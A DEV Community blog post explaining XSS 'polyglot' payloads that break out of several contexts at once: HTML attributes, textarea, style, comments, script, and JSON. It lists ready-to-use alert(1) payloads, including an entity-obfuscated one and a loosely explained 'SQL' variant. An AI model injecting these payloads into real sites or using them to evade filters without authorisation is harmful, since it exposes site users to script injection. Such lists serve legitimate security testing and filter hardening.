DEV Community

Mrhili Mohamed Amine
Mrhili Mohamed Amine

Posted on

What is a polyglot in Hacking

Polygloting in language is talking two languages or more

Polygloting in hacking is like testing two thing or more in the same time

XSS Polyglots: Technical Payloads
Basic Polyglot Example
Escape common string filters in both HTML and JavaScript contexts.

<img src=x onerror="';alert(1)//">
Enter fullscreen mode Exit fullscreen mode

This works in cases where an input is included in both JavaScript and HTML, bypassing simple quote escapes.

Escaping Multiple Contexts
HTML + JavaScript + SQL:

';alert(1);//--><img src=x onerror=alert(1)>"
Enter fullscreen mode Exit fullscreen mode

Exploits SQL injection followed by triggering a JavaScript alert within HTML.

Injecting Through HTML Attributes
Use different HTML elements and attributes to escape.

<div class="{{payload}}"></div>
<script type="text/javascript">{{payload}}</script>
<style>{{payload}}</style>
<textarea>{{payload}}</textarea>
Enter fullscreen mode Exit fullscreen mode

Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
</textarea><svg onload=alert(1)>"
Enter fullscreen mode Exit fullscreen mode

XSS via Multiple HTML Tags
Expand attack vectors by targeting various HTML tags:

<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<select><option>{{payload}}</option></select>
Enter fullscreen mode Exit fullscreen mode

Polyglot Payload:

" onmouseover=alert(1)// 
' onmouseover=alert(1)// 
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>
Enter fullscreen mode Exit fullscreen mode

XSS in HTML Comments
Even comments can be abused if not properly sanitized.

<!--{{payload}}-->
Enter fullscreen mode Exit fullscreen mode

Polyglot Payload:

--><svg onload=alert(1)> 
Enter fullscreen mode Exit fullscreen mode

Advanced Payload Combination
Combine various contexts to craft a versatile polyglot:

<div class="{{payload}}"></div>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<script>{{payload}}</script>
<!--{{payload}}-->
Enter fullscreen mode Exit fullscreen mode

Ultimate Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
<img src onerror=alert(1)>
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>
</noscript><svg onload=alert(1)>
</noembed><svg onload=alert(1)>
--><svg onload=alert(1)>
Enter fullscreen mode Exit fullscreen mode

Obfuscated Payload
Use HTML entities or JavaScript obfuscation to bypass filters:

<svg/onload='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;'>
Enter fullscreen mode Exit fullscreen mode

JSON + XSS Polyglot
If the payload is passed into JSON:

{"key":"\"},\"anything\":\"<img src=x onerror=alert(1)>//"}
Enter fullscreen mode Exit fullscreen mode

This closes the JSON key, injects the XSS, and continues the valid JSON.

Conclusion
These payloads represent different ways of exploiting XSS vulnerabilities using polyglots. By targeting multiple contexts—such as attributes, scripts, and comments—you increase your chances of bypassing filters and exploiting vulnerabilities effectively.

This approach makes it versatile, with focus on injecting through multiple contexts using minimal characters.

Image of Timescale

Timescale – the developer's data platform for modern apps, built on PostgreSQL

Timescale Cloud is PostgreSQL optimized for speed, scale, and performance. Over 3 million IoT, AI, crypto, and dev tool apps are powered by Timescale. Try it free today! No credit card required.

Try free

Top comments (0)

Billboard image

Use Playwright to test. Use Playwright to monitor.

Join Vercel, CrowdStrike, and thousands of other teams that run end-to-end monitors on Checkly's programmable monitoring platform.

Get started now!

👋 Kindness is contagious

Explore a sea of insights with this enlightening post, highly esteemed within the nurturing DEV Community. Coders of all stripes are invited to participate and contribute to our shared knowledge.

Expressing gratitude with a simple "thank you" can make a big impact. Leave your thanks in the comments!

On DEV, exchanging ideas smooths our way and strengthens our community bonds. Found this useful? A quick note of thanks to the author can mean a lot.

Okay